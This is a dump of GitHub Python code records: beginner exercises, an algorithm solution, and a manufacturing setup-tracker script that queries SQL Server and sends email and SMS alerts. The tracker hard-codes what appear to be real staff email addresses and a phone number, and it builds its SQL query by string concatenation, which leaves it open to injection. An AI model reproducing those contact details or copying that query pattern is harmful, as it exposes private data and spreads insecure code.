application.run_polling()","repo_name":"Pomoinytskyi/NewsFeed","sub_path":"source/TelegramBot/TelegramBot.py","file_name":"TelegramBot.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41148598031","text":"from itertools import product\n\ntest_dict = {'month': [1, 2, 3], 'name': ['Jan', 'Feb', 'March']}\n\nprint(\"The original dictionary is : \" + str(test_dict))\n\nres = dict(zip(test_dict['month'], test_dict['name']))\n\nprint(\"Flattened dictionary : \" + str(res))\n\n\ndef UncommonWords(A, B):\n\n count = {}\n\n for word in A.split():\n count[word] = count.get(word, 0) + 1\n\n for word in B.split():\n count[word] = count.get(word, 0) + 1\n\n return [word for word in count if count[word] == 1]\n\n\nA = \"Geeks for Geeks\"\nB = \"Learning from Geeks for Geeks\"\n\nprint(UncommonWords(A, B))\n\nprint(\"1) Fibonacci Sequence\")\n\n\ndef fibonacci(n):\n if n == 0 or n == 1:\n return n\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)\n\n\nprint(fibonacci(5))\n\nprint(\"2) Factorial of Number\")\n\n\ndef factorial(n):\n if n == 1:\n return 1\n ans = n * factorial(n - 1)\n return ans\n\n\nprint(factorial(5))\n\nprint(\"3) Printing lists\")\n\nl = [1, 5, 10, 15, 20, 25, 30]\n\nodd_elements = l[1::2]\nprint(odd_elements)\n\neven_elements = l[0::2]\nprint(even_elements)\n\nprint(\"4) Find occurence of each element\")\n\nsample_list = [11, 25, 23, 35, 11, 25, 45, 60]\n\ncount_dict = dict()\n\nfor item in sample_list:\n if item in count_dict:\n count_dict[item] += 1\n else:\n count_dict[item] = 1\n\nprint(count_dict)\n\narr = [9, 8, 7, 6, 5, 4, 3, 2, 1]\nprint(\"5) Bubble Sort\")\n\n\ndef bubble_sort(arr):\n n = len(arr)\n for iter_num in range(n):\n for current in range(n - 1 - iter_num):\n if arr[current] > arr[current + 1]:\n arr[current], arr[current + 1] = arr[current + 1], arr[current]\n\n\nbubble_sort(arr)\nprint(arr)\n\n\ndef select_sort(arr):\n n = len(arr)\n for iter_num in range(n):\n min_index = iter_num\n for current in range(iter_num + 1, n):\n if arr[current] < arr[min_index]:\n min_index = current\n arr[min_index], arr[iter_num] = arr[iter_num], arr[min_index]\n\n\nselect_sort(arr)\nprint(arr)\n\nprint(\"6) Natural numbers\")\ni = 1\nwhile i <= 10:\n print(i)\n i += 1\n\nprint(\"7) Sum of numbers\")\nsum = 0\n# n = int(input(\"Enter num \"))\nn = 10\n\nfor i in range(1, n + 1, 1):\n sum += i\nprint(sum)\n\nprint(\"8) Number pattern\")\n\nrow = 5\nfor i in range(1, row + 1, 1):\n for j in range(1, i + 1):\n print(j, end=' ')\n print(\" \")\n\nprint(\"Print pattern\")\n\nfor num in range(10):\n for i in range(num):\n print(num, end=\" \")\n print(\"\\n\")\n\nprint(\"Asterick pattern\")\n\nfor i in range(6, 0, -1):\n for j in range(0, i - 1):\n print(\"*\", end=' ')\n print(\" \")\n\nprint(\"Add list to set\")\n\nsample_set = {\"Yellow\", \"Orange\", \"Black\"}\nsample_list = [\"Blue\", \"Green\", \"Red\"]\n\nsample_set.update(sample_list)\nprint(sample_set)\n\nprint(\"Identical numbers in two sets\")\n\nset1 = {10, 20, 30, 40, 50}\nset2 = {30, 40, 50, 60, 70}\n\nprint(set1.intersection(set2))\n\nprint(\"Update set if element does not exist\")\n\nset1 = {10, 20, 30}\nset2 = {20, 40, 50}\n\nset1.difference_update(set2)\nprint(set1)\n\nprint(\"Print list in reverse\")\nlist1 = [10, 20, 30, 40, 50]\n\nsize = len(list1) - 1\nfor i in range(size, -1, -1):\n print(list1[i])\n\nprint(\"New Pattern\")\n\nrows = 5\nfor i in range(0, rows):\n for j in range(0, i + 1):\n print(\"*\", end=' ')\n print(\"\\r\")\n\nfor i in range(rows, 0, -1):\n for j in range(0, i - 1):\n print(\"*\", end=' ')\n print(\"\\r\")\n\n\ndef rotateArray(arr, n, d):\n temp = []\n i = 0\n while (i < d):\n temp.append(arr[i])\n i = i + 1\n i = 0\n while (d < n):\n arr[i] = arr[d]\n i = i + 1\n d = d + 1\n arr[:] = arr[:i] + temp\n return arr\n\n\narr = [1, 2, 3, 4, 5, 6, 7]\nprint(\"Array after left rotation is: \", end=' ')\nprint(rotateArray(arr, len(arr), 2))\n\n\ndef splitArr(arr, n, k):\n for i in range(0, k):\n x = arr[0]\n for j in range(0, n - 1):\n arr[j] = arr[j + 1]\n\n arr[n - 1] = x\n\n\n# main\narr = [12, 10, 5, 6, 52, 36]\nn = len(arr)\nposition = 2\n\nsplitArr(arr, n, position)\n\nfor i in range(0, n):\n print(arr[i], end=' ')\n\n\ndef dedupe_v1(x):\n y = []\n for i in x:\n if i not in y:\n y.append(i)\n return y\n\n\ndef dedupe_v2(x):\n return list(set(x))\n\n\na = [1, 2, 3, 4, 3, 2, 1]\nprint(dedupe_v1(a))\nprint(dedupe_v2(a))\n\n\ndef swapList(newList):\n size = len(newList)\n\n temp = newList[0]\n newList[0] = newList[size - 1]\n newList[size - 1] = temp\n\n return newList\n\n\nnewList = [12, 35, 9, 56, 24]\n\nprint(swapList(newList))\n\n\ndef swapPositions(list, pos1, pos2):\n\n list[pos1], list[pos2] = list[pos2], list[pos1]\n return list\n\n\n# Driver function\nList = [23, 65, 19, 90]\npos1, pos2 = 1, 3\n\nprint(swapPositions(List, pos1 - 1, pos2 - 1))\n\n\ndef isMonotonic(A):\n\n return (all(A[i] <= A[i + 1] for i in range(len(A) - 1))\n or all(A[i] >= A[i + 1] for i in range(len(A) - 1)))\n\n\nA = [6, 5, 4, 4]\n\nprint(isMonotonic(A))\n\n\ndef simple_interest(p, t, r):\n print('The principal is', p)\n print('The time period is', t)\n print('The rate of interest is', r)\n\n si = (p * t * r) / 100\n\n print('The Simple Interest is', si)\n return si\n\n\nsimple_interest(8, 6, 8)\n\n\ndef compound_interest(principle, rate, time):\n\n # Calculates compound interest\n Amount = principle * (pow((1 + rate / 100), time))\n CI = Amount - principle\n print(\"Compound interest is\", CI)\n\n\n# Driver Code\ncompound_interest(10000, 10.25, 5)\n\n\ndef findArea(r):\n PI = 3.142\n return PI * (r * r)\n\n\n# Driver method\nprint(\"Area is %.6f\" % findArea(5))\n\n\ndef prime(x, y):\n prime_list = []\n for i in range(x, y):\n if i == 0 or i == 1:\n continue\n else:\n for j in range(2, int(i / 2) + 1):\n if i % j == 0:\n break\n else:\n prime_list.append(i)\n return prime_list\n\n\n# Driver program\nstarting_range = 2\nending_range = 7\nlst = prime(starting_range, ending_range)\nif len(lst) == 0:\n print(\"There are no prime numbers in this range\")\nelse:\n print(\"The prime numbers in this range are: \", lst)\n\n\ndef squaresum(n):\n sm = 0\n for i in range(1, n + 1):\n sm = sm + (i * i)\n\n return sm\n\n\nn = 4\n\nimport math\n\n\ndef isPerfectSquare(x):\n s = int(math.sqrt(x))\n return s * s == x\n\n\ndef isFibonacci(n):\n\n return isPerfectSquare(5 * n * n + 4) or isPerfectSquare(5 * n * n - 4)\n\n\nfor i in range(1, 11):\n if (isFibonacci(i) == True):\n print(i, \"is a Fibonacci Number\")\n else:\n print(i, \"is a not Fibonacci Number \")\n\n# Python 3 code to find sum\n# of elements in given array\n\n\ndef _sum(arr):\n sum = 0\n for i in arr:\n sum = sum + i\n\n return (sum)\n\n\narr = []\narr = [12, 3, 4, 15]\n\nn = len(arr)\n\nans = _sum(arr)\n\nprint('Sum of the array is ', ans)\n\n\ndef largest(arr, n):\n\n max = arr[0]\n for i in range(1, n):\n if arr[i] > max:\n max = arr[i]\n return max\n\n\narr = [10, 324, 45, 90, 9808]\nn = len(arr)\nAns = largest(arr, n)\nprint(\"Largest in given array \", Ans)\n\n#\n\n\ndef splitArr(arr, n, k):\n for i in range(0, k):\n x = arr[0]\n for j in range(0, n - 1):\n arr[j] = arr[j + 1]\n\n arr[n - 1] = x\n\n\narr = [12, 10, 5, 6, 52, 36]\nn = len(arr)\nposition = 2\n\nsplitArr(arr, n, position)\n\nfor i in range(0, n):\n print(arr[i], end=' ')\n\ntest_list = [1, 4, 5, 7, 8]\n\nprint(\"The list is : \" + str(test_list))\n\ncounter = 0\nfor i in test_list:\n\n counter = counter + 1\n\nprint(\"Length of list using naive method is : \" + str(counter))\n\nlst = [1, 6, 3, 5, 3, 4]\ni = 7\nif i in lst:\n print(\"exist\")\nelse:\n print(\"not exist\")\n\ntotal = 0\n\nlist1 = [11, 5, 17, 18, 23]\n\nfor ele in range(0, len(list1)):\n total = total + list1[ele]\n\nprint(\"Sum of all elements in given list: \", total)\n\n\ndef multiplyList(myList):\n\n result = 1\n for x in myList:\n result = result * x\n return result\n\n\nlist1 = [1, 2, 3]\nlist2 = [3, 2, 4]\nprint(multiplyList(list1))\nprint(multiplyList(list2))\n\nlist1 = [10, 20, 4, 45, 99]\n\nmx = max(list1[0], list1[1])\nsecondmax = min(list1[0], list1[1])\nn = len(list1)\nfor i in range(2, n):\n if list1[i] > mx:\n secondmax = mx\n mx = list1[i]\n elif list1[i] > secondmax and \\\n mx != list1[i]:\n secondmax = list1[i]\n elif mx == secondmax and \\\n secondmax != list1[i]:\n secondmax = list1[i]\n\nprint(\"Second highest number is : \",\\\n str(secondmax))\n\n\ndef Nmaxelements(list1, N):\n final_list = []\n\n for i in range(0, N):\n max1 = 0\n\n for j in range(len(list1)):\n if list1[j] > max1:\n max1 = list1[j]\n\n list1.remove(max1)\n final_list.append(max1)\n\n print(final_list)\n\n\nlist1 = [2, 6, 41, 85, 0, 3, 7, 6, 10]\nN = 2\n\nNmaxelements(list1, N)\n\nlist1 = [10, 21, 4, 45, 66, 93]\n\nfor num in list1:\n\n if num % 2 == 0:\n print(num, end=\" \")\n\nlist1 = [10, 21, 4, 45, 66, 93]\n\nfor num in list1:\n\n if num % 2 != 0:\n print(num, end=\" \")\n\nstart = int(input(\"Enter the start of range: \"))\nend = int(input(\"Enter the end of range: \"))\n\nfor num in range(start, end + 1):\n\n if num % 2 == 0:\n print(num, end=\" \")\n\nstart, end = 4, 19\n\nfor num in range(start, end + 1):\n\n if num % 2 != 0:\n print(num, end=\" \")\n\nlist1 = [11, -21, 0, 45, 66, -93]\n\nfor num in list1:\n\n if num >= 0:\n print(num, end=\" \")\n\nlist1 = [11, -21, 0, 45, 66, -93]\n\nfor num in list1:\n\n if num < 0:\n print(num, end=\" \")\n\nstart = int(input(\"Enter the start of range: \"))\nend = int(input(\"Enter the end of range: \"))\n\nfor num in range(start, end + 1):\n\n if num >= 0:\n print(num, end=\" \")\n\nlist1 = [11, 5, 17, 18, 23, 50]\n\nfor ele in list1:\n if ele % 2 == 0:\n list1.remove(ele)\n\nprint(\"New list after removing all even numbers: \", list1)\n\ntest_list = [5, 6, [], 3, [], [], 9]\n\nprint(\"The original list is : \" + str(test_list))\n\nres = [ele for ele in test_list if ele != []]\n\nprint(\"List after empty list removal : \" + str(res))\n\ntest_list = [12, 67, 98, 34]\n\nprint(\"The original list is : \" + str(test_list))\n\nres = []\nfor ele in test_list:\n sum = 0\n for digit in str(ele):\n sum += int(digit)\n res.append(sum)\n\nprint(\"List Integer Summation : \" + str(res))\n\n\ndef Repeat(x):\n _size = len(x)\n repeated = []\n for i in range(_size):\n k = i + 1\n for j in range(k, _size):\n if x[i] == x[j] and x[i] not in repeated:\n repeated.append(x[i])\n return repeated\n\n\nlist1 = [10, 20, 30, 20, 20, 30, 40, 50, -20, 60, 60, -20, -20]\nprint(Repeat(list1))\n\n\ndef Cumulative(lists):\n cu_list = []\n length = len(lists)\n cu_list = [sum(lists[0:x:1]) for x in range(0, length + 1)]\n return cu_list[1:]\n\n\nlists = [10, 20, 30, 40, 50]\nprint(Cumulative(lists))\n\nstring = \"geeks for geeks\"\nsubstring = \"geeks\"\n\ns = string.split()\n\nif substring in s:\n print(\"yes\")\nelse:\n print(\"no\")\n\nstring = \"Sam quiz practice code\"\ns = string.split()[::-1]\nl = []\nfor i in s:\n l.append(i)\nprint(\" \".join(l))\n\nlist1 = [1, 2, 3]\n\nprint(\"List1 before deleting is : \" + str(list1))\n\nlist1 *= 0\n\nprint(\"List1 after clearing using *= 0: \" + str(list1))\n\nlist1 = [1, 2, 3]\nlist2 = [5, 6, 7]\n\nprint(\"List1 before deleting is : \" + str(list1))\n\ndel list1[:]\nprint(\"List1 after clearing using del : \" + str(list1))\n\nprint(\"List2 before deleting is : \" + str(list2))\n\ndel list2[:]\nprint(\"List2 after clearing using del : \" + str(list2))\n\n# Program to add two matrices using nested loop\n\nX = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n\nY = [[9, 8, 7], [6, 5, 4], [3, 2, 1]]\n\nresult = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n\nfor i in range(len(X)):\n for j in range(len(X[0])):\n result[i][j] = X[i][j] + Y[i][j]\n\nfor r in result:\n print(r)\n\nA = [[12, 7, 3], [4, 5, 6], [7, 8, 9]]\n\nB = [[5, 8, 1, 2], [6, 7, 3, 0], [4, 5, 9, 1]]\n\nresult = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]]\n\nfor i in range(len(A)):\n\n for j in range(len(B[0])):\n\n for k in range(len(B)):\n result[i][j] += A[i][k] * B[k][j]\n\nfor r in result:\n print(r)\n\n\ndef prod(val):\n res = 1\n for ele in val:\n res *= ele\n return res\n\n\ntest_list = [[1, 4, 5], [7, 3], [4], [46, 7, 3]]\n\nprint(\"The original list : \" + str(test_list))\n\nres = prod([ele for sub in test_list for ele in sub])\n\nprint(\"The total element product in lists is : \" + str(res))\n\nn = \"This is a python language\"\ns = n.split(\" \")\nfor i in s:\n if len(i) % 2 == 0:\n print(i)\n\n\ndef check(string):\n\n string = string.lower()\n\n vowels = set(\"aeiou\")\n\n s = set({})\n\n for char in string:\n\n if char in vowels:\n s.add(char)\n else:\n pass\n\n if len(s) == len(vowels):\n print(\"Accepted\")\n else:\n print(\"Not Accepted\")\n\n\nif __name__ == \"__main__\":\n\n string = \"SEEquoiaL\"\n\n check(string)\n\n\ndef removeDuplicate(str):\n s = set(str)\n s = \"\".join(s)\n print(\"Without Order:\", s)\n t = \"\"\n for i in str:\n if (i in t):\n pass\n else:\n t = t + i\n print(\"With Order:\", t)\n\n\nstr = \"HellomynameisHello\"\nremoveDuplicate(str)\n\ntest_str = \"GeeksforGeeks\"\n\nprint(\"The original string is : \" + test_str)\n\nall_freq = {}\nfor i in test_str:\n if i in all_freq:\n all_freq[i] += 1\nelse:\n all_freq[i] = 1\nres = min(all_freq, key=all_freq.get)\n\nprint(\"The minimum of all characters in GeeksforGeeks is : \" + str(res))\n\ntest_str = \"GeeksforGeeks\"\n\nprint(\"The original string is : \" + test_str)\n\nall_freq = {}\nfor i in test_str:\n if i in all_freq:\n all_freq[i] += 1\nelse:\n all_freq[i] = 1\nres = max(all_freq, key=all_freq.get)\n\nprint(\"The maximum of all characters in GeeksforGeeks is : \" + str(res))\n\ninput_string = \"geeksforgeeks\"\ns1 = \"geeks\"\ns2 = \"abcd\"\ninput_string = input_string.replace(s1, s2)\nprint(input_string)\n\ntest_str = \"geeksforgeeks\"\ns1 = \"geeks\"\ns2 = \"abcd\"\n\ns = test_str.split(s1)\nnew_str = \"\"\n\nfor i in s:\n if (i == \"\"):\n new_str += s2\n else:\n new_str += i\n\nprint(new_str)\n\ntest_dict = {\n 'gfg': [5, 6, 7, 8],\n 'is': [10, 11, 7, 5],\n 'best': [6, 12, 10, 8],\n 'for': [1, 2, 5]\n}\n\nprint(\"The original dictionary is : \" + str(test_dict))\n\nres = list(sorted({ele for val in test_dict.values() for ele in val}))\n\nprint(\"The unique values list is : \" + str(res))\n\n\ndef returnSum(myDict):\n\n list = []\n for i in myDict:\n list.append(myDict[i])\n final = sum(list)\n\n return final\n\n\ndict = {'a': 100, 'b': 200, 'c': 300}\nprint(\"Sum :\", returnSum(dict))\n\n\ndef Merge(dict1, dict2):\n return (dict2.update(dict1))\n\n\ndict1 = {'a': 10, 'b': 8}\ndict2 = {'d': 6, 'c': 4}\n\nprint(Merge(dict1, dict2))\n\nprint(dict2)\n\nimport sys\n\nTuple1 = (\"A\", 1, \"B\", 2, \"C\", 3)\nTuple2 = (\"Geek1\", \"Raju\", \"Geek2\", \"Nikhil\", \"Geek3\", \"Deepanshu\")\nTuple3 = ((1, \"Lion\"), (2, \"Tiger\"), (3, \"Fox\"), (4, \"Wolf\"))\n\nprint(\"Size of Tuple1: \" + str(sys.getsizeof(Tuple1)) + \"bytes\")\nprint(\"Size of Tuple2: \" + str(sys.getsizeof(Tuple2)) + \"bytes\")\nprint(\"Size of Tuple3: \" + str(sys.getsizeof(Tuple3)) + \"bytes\")\n\n\ndef split_string(string):\n\n list_string = string.split(' ')\n\n return list_string\n\n\ndef join_string(list_string):\n\n string = '-'.join(list_string)\n\n return string\n\n\nif __name__ == '__main__':\n string = 'Geeks for Geeks'\n\n list_string = split_string(string)\n print(list_string)\n\n new_string = join_string(list_string)\n print(new_string)\n\ns = 'Geeks for Geeks'\nprint(s.split(\" \"))\nprint(\"-\".join(s.split()))\n\ntest_str = 'Gfg is best . Gfg also has Classes now. \\\n\t\t\t\tClasses help understand better . '\n\nprint(\"The original string is : \" + str(test_str))\n\nrepl_dict = {'Gfg': 'It', 'Classes': 'They'}\n\ntest_list = test_str.split(' ')\nres = set()\nfor idx, ele in enumerate(test_list):\n if ele in repl_dict:\n if ele in res:\n test_list[idx] = repl_dict[ele]\n else:\n res.add(ele)\nres = ' '.join(test_list)\n\nprint(\"The string after replacing : \" + str(res))\n\ntest_str = 'It is the best thing ever for CS'\n\nprint(\"The original string is : \" + str(test_str))\n\nword_list = [\"best\", 'CS', 'for']\n\nrepl_wrd = 'gfg'\n\nres = ' '.join(\n [repl_wrd if idx in word_list else idx for idx in test_str.split()])\n\nprint(\"String after multiple replace : \" + str(res))\n\ntest_tup = (5, 20, 3, 7, 6, 8)\n\nprint(\"The original tuple is : \" + str(test_tup))\n\nK = 2\n\nres = []\ntest_tup = list(sorted(test_tup))\n\nfor idx, val in enumerate(test_tup):\n if idx < K or idx >= len(test_tup) - K:\n res.append(val)\nres = tuple(res)\n\nprint(\"The extracted values : \" + str(res))\n\ntest_tuple1 = (4, 5)\ntest_tuple2 = (7, 8)\n\nprint(\"The original tuple 1 : \" + str(test_tuple1))\nprint(\"The original tuple 2 : \" + str(test_tuple2))\n\nres = [(a, b) for a in test_tuple1 for b in test_tuple2]\nres = res + [(a, b) for a in test_tuple2 for b in test_tuple1]\n\nprint(\"The filtered tuple : \" + str(res))\n\ntest_dict = {\"Arushi\": 22, \"Anuradha\": 21, \"Mani\": 21, \"Haritha\": 21}\n\nprint(\"The dictionary before performing remove is : \" + str(test_dict))\n\nremoved_value = test_dict.pop('Mani')\n\nprint(\"The dictionary after remove is : \" + str(test_dict))\nprint(\"The removed key's value is : \" + str(removed_value))\n\nprint('\\r')\n\nremoved_value = test_dict.pop('Manjeet', 'No Key found')\n\nprint(\"The dictionary after remove is : \" + str(test_dict))\nprint(\"The removed key's value is : \" + str(removed_value))\n\n\ndef swapPositions(list, pos1, pos2):\n\n list[pos1], list[pos2] = list[pos2], list[pos1]\n return list\n\n\nList = [23, 65, 19, 90]\npos1, pos2 = 1, 3\n\nprint(swapPositions(List, pos1 - 1, pos2 - 1))\n\ntest_dict = {'gfg': [7, 6, 3], 'is': [2, 10, 3], 'best': [19, 4]}\n\nprint(\"The original dictionary is : \" + str(test_dict))\n\nres = dict()\nfor key in sorted(test_dict):\n res[key] = sorted(test_dict[key])\n\nprint(\"The sorted dictionary : \" + str(res))\n\n\ndef reverse_list(arr):\n left = 0\n right = len(arr) - 1\n while (left < right):\n temp = arr[left]\n arr[left] = arr[right]\n arr[right] = temp\n left += 1\n right -= 1\n\n return arr\n\n\narr = [1, 2, 3, 4, 5, 6, 7]\nprint(reverse_list(arr))\n\n\ndef search(arr, x):\n\n for i in range(len(arr)):\n\n if arr[i] == x:\n return i\n\n return -1\n\n\ndef selectionSort(array, size):\n\n for ind in range(size):\n min_index = ind\n\n for j in range(ind + 1, size):\n if array[j] < array[min_index]:\n min_index = j\n (array[ind], array[min_index]) = (array[min_index], array[ind])\n\n\narr = [-2, 45, 0, 11, -9, 88, -97, -202, 747]\nsize = len(arr)\nselectionSort(arr, size)\nprint('The array after sorting in Ascending Order by selection sort is:')\nprint(arr)\n\n\ndef bubbleSort(arr):\n n = len(arr)\n swapped = False\n for i in range(n - 1):\n for j in range(0, n - i - 1):\n\n if arr[j] > arr[j + 1]:\n swapped = True\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n\n if not swapped:\n return\n\n\narr = [64, 34, 25, 12, 22, 11, 90]\n\nbubbleSort(arr)\n\nprint(\"Sorted array is:\")\nfor i in range(len(arr)):\n print(\"% d\" % arr[i], end=\" \")\n\nfrom datetime import datetime\n\nnow_method = datetime.now()\n\ncurrentTime = now_method.strftime(\"%H:%M:%S\")\nprint(\"Current Time =\", currentTime)\n\n# Python program for implementation of MergeSort\n\n# Merges two subarrays of arr[].\n# First subarray is arr[l..m]\n# Second subarray is arr[m+1..r]\n\n\ndef merge(arr, l, m, r):\n\tn1 = m - l + 1\n\tn2 = r - m\n\n\t# create temp arrays\n\tL = [0] * (n1)\n\tR = [0] * (n2)\n\n\t# Copy data to temp arrays L[] and R[]\n\tfor i in range(0, n1):\n\t\tL[i] = arr[l + i]\n\n\tfor j in range(0, n2):\n\t\tR[j] = arr[m + 1 + j]\n\n\t# Merge the temp arrays back into arr[l..r]\n\ti = 0\t # Initial index of first subarray\n\tj = 0\t # Initial index of second subarray\n\tk = l\t # Initial index of merged subarray\n\n\twhile i < n1 and j < n2:\n\t\tif L[i] <= R[j]:\n\t\t\tarr[k] = L[i]\n\t\t\ti += 1\n\t\telse:\n\t\t\tarr[k] = R[j]\n\t\t\tj += 1\n\t\tk += 1\n\n\t# Copy the remaining elements of L[], if there\n\t# are any\n\twhile i < n1:\n\t\tarr[k] = L[i]\n\t\ti += 1\n\t\tk += 1\n\n\twhile j < n2:\n\t\tarr[k] = R[j]\n\t\tj += 1\n\t\tk += 1\n\ndef mergeSort(arr, l, r):\n\tif l < r:\n\t\tm = l+(r-l)//2\n\n\t\tmergeSort(arr, l, m)\n\t\tmergeSort(arr, m+1, r)\n\t\tmerge(arr, l, m, r)\n\n\narr = [12, 11, 13, 5, 6, 7]\nn = len(arr)\nprint(\"Given array is\")\nfor i in range(n):\n\tprint(\"%d\" % arr[i],end=\" \")\n\nmergeSort(arr, 0, n-1)\nprint(\"\\n\\nSorted array is\")\nfor i in range(n):\n\tprint(\"%d\" % arr[i],end=\" \")\n\ndef Pattern(line):\n\tpat=\"\"\n\tfor i in range(0,line):\n\t\tfor j in range(0,line):\t\n\t\t\tif ((j == 1 and i != 0 and i != line-1) or ((i == 0 or\n\t\t\t\ti == line-1) and j > 1 and j < line-2) or (i == ((line-1)/2)\n\t\t\t\tand j > line-5 and j < line-1) or (j == line-2 and\n\t\t\t\ti != 0 and i != line-1 and i >=((line-1)/2))):\n\t\t\t\tpat=pat+\"*\"\n\t\t\telse:\t\n\t\t\t\tpat=pat+\" \"\n\t\tpat=pat+\"\\n\"\n\treturn pat\n\nline = 7\nprint(Pattern(line))\n\n\n\ndef Find(string):\n\tx=string.split()\n\tres=[]\n\tfor i in x:\n\t\tif i.startswith(\"https:\") or i.startswith(\"http:\"):\n\t\t\tres.append(i)\n\treturn res\n\t\t\t\nstring = 'My Profile: https://auth.geeksforgeeks.org/user/Chinmoy%20Lenka/articles in the portal of https://www.geeksforgeeks.org/'\nprint(\"Urls: \", Find(string))\n","repo_name":"SyedSibtainRazvi/Python-Basics","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"429990089","text":"import sys\ninput = sys.stdin.readline\n\ndef solution(N, M, arr):\n answer = 1\n for row in range(N):\n for col in range(M):\n limit = N-row if N-row < M-col else M-col\n for size in range(1, limit):\n if arr[row][col] == arr[row+size][col] == arr[row][col+size] == arr[row+size][col+size]:\n answer = max(answer, (size+1)**2)\n\n return answer\n \nif __name__ == '__main__':\n N, M = map(int, input().split())\n arr = [input() for _ in range(N)]\n result = solution(N, M, arr)\n print(result)\n","repo_name":"worldbrighteststar/Boostcamp_2st_Hot6","sub_path":"Algorithm/SEONGWON/1051.py","file_name":"1051.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73170233154","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 17 11:30:50 2020\n\n@author: JBriggs\n\"\"\"\n\nimport pandas as pd\nimport send_email as email\nimport time\nimport pyodbc as db\n\nwippath = \"G:\\\\3 - Production Departments\\\\4 - Grinding\\\\0 - Department Documents\\\\4 - Programs & Software\\\\1 - Operating Software\\\\Setup_Tracker\\\\Data\\\\setups_in_progress.csv\"\nlatepath = \".\\\\latewip.csv\"\nwarnpath = \".\\\\warnwip.csv\"\ntwohourpath = \".\\\\twohoursetup.csv\"\n\njoe = 'jbriggs@catiglass.com;'\npenny = 'penny.quandt@catiglass.com;'\nslawek = 'slawek@catiglass.com;'\nsend_to = joe\njoephone = '8159006943@txt.att.net'\ntext_to = joephone\n\ndef getJobData(jobnum):\n jobnum = \"'\" + jobnum.upper() + \"'\" \n with open('sql_access.txt', 'r') as file:\n access = file.readlines()\n \n\n job_data = {}\n conn = db.connect('Driver={SQL Server};'\n 'Server=SVR-APP\\\\SQLEXPRESS;'\n + access[0] +\n 'Trusted_Connect=yes;')\n \n command = (\"SELECT Parts.CustName, Parts.CustPartNum \"\n \"FROM QssCatiJobTrack.dbo.Jobs, QssCatiJobTrack.dbo.Parts \"\n \"WHERE Jobs.JobNum LIKE \" + jobnum + \" \"\n \"AND Jobs.PartID = Parts.PartID \") \n \n cursor = conn.cursor()\n \n cursor.execute(command)\n \n for row in cursor:\n job_data[jobnum] = [row[0],row[1]]\n cursor.close()\n conn.close()\n return job_data\n\ndef formatMessage(jlist,machine,et,operator):\n #this returns a string containing dict data in a more human readable format\n msg = \"\"\n \n for k in sorted(jlist):\n job = k.strip(\"'\")\n cust = jlist[k][0]\n p_num = jlist[k][1] \n msg = (\"Job \" + job + \" for \" + cust + \", part # \" + p_num + \n \" at \" + machine + \" is currently at \" + str(et) + \" elapsed time. Tech is \" + operator + \".\")\n return msg\n\ndef checkWip():\n wip = pd.read_csv(wippath)\n now = pd.Timestamp.now()\n wip['timestamp'] = wip['Start Date'].astype(str) + \"T\" + wip['Start Time'].astype(str) \n wip['timestamp'] = pd.to_datetime(wip['timestamp']) \n wip['elapsed'] = now - wip['timestamp']\n warning = wip.elapsed.dt.total_seconds() >= 2700\n overtime = wip.elapsed.dt.total_seconds() > 3600\n two_hours = wip.elapsed.dt.total_seconds() > 7200\n \n return wip[overtime], wip[warning], wip[two_hours]\n\n\ndef manageOT():\n late_wip, warn_wip, two_hours = checkWip()\n \n column_names = ['Job Number','Machine','Setup Tech','Start Date','Start Time','timestamp','elapsed']\n \n while True:\n try:\n prev_late = pd.read_csv(latepath)\n except FileNotFoundError as fnf:\n print(fnf, 'Creating missing file.')\n df = pd.DataFrame(columns = column_names)\n df.to_csv('latewip.csv')\n continue\n \n try:\n prev_warn = pd.read_csv(warnpath)\n except FileNotFoundError as fnf:\n print(fnf, 'Creating missing file.')\n df = pd.DataFrame(columns = column_names)\n df.to_csv('warnwip.csv')\n continue\n \n try:\n two_late = pd.read_csv(twohourpath)\n except FileNotFoundError as fnf:\n print(fnf, 'Creating missing file.')\n df = pd.DataFrame(columns = column_names)\n df.to_csv('twohoursetup.csv')\n continue\n break\n \n late_wip.to_csv('latewip.csv', index=False)\n warn_wip.to_csv('warnwip.csv', index=False)\n two_hours.to_csv('twohoursetup.csv', index=False)\n \n jac = prev_late['Job Number'].unique().astype(str)\n wjac = prev_warn['Job Number'].unique().astype(str)\n tjac = two_late['Job Number'].unique().astype(str)\n \n for row in late_wip.itertuples(index=False):\n jobnum = str(getattr(row, '_0')) \n machine = getattr(row, 'Machine')\n operator = getattr(row, '_2')\n et = getattr(row,'elapsed')\n if jobnum not in jac: \n # need to send email\n subject = 'Grinding setup over 1 hour: Job # ' + jobnum\n job_list = getJobData(jobnum)\n msg = formatMessage(job_list,machine,et,operator)\n email.mailMessage(send_to, subject, msg)\n email.txtMessage(text_to, subject, msg)\n \n for row in warn_wip.itertuples(index=False):\n jobnum = str(getattr(row, '_0')) \n machine = getattr(row, 'Machine')\n operator = getattr(row, '_2')\n et = getattr(row,'elapsed')\n if jobnum not in wjac: \n # need to send email\n subject = 'Grinding setup 45 minutes warning: Job # ' + jobnum\n job_list = getJobData(jobnum)\n msg = formatMessage(job_list,machine,et,operator)\n email.mailMessage(send_to, subject, msg)\n email.txtMessage(text_to, subject, msg)\n \n for row in two_hours.itertuples(index=False):\n jobnum = str(getattr(row, '_0')) \n machine = getattr(row, 'Machine')\n operator = getattr(row, '_2')\n et = getattr(row,'elapsed')\n if jobnum not in tjac: \n # need to send email\n subject = 'Grinding setup over 2 hours: Job # ' + jobnum\n job_list = getJobData(jobnum)\n msg = formatMessage(job_list,machine,et,operator)\n email.mailMessage(send_to, subject, msg)\n email.txtMessage(text_to, subject, msg)\n \n \n \nif __name__ == \"__main__\":\n while True:\n checkWip()\n manageOT()\n 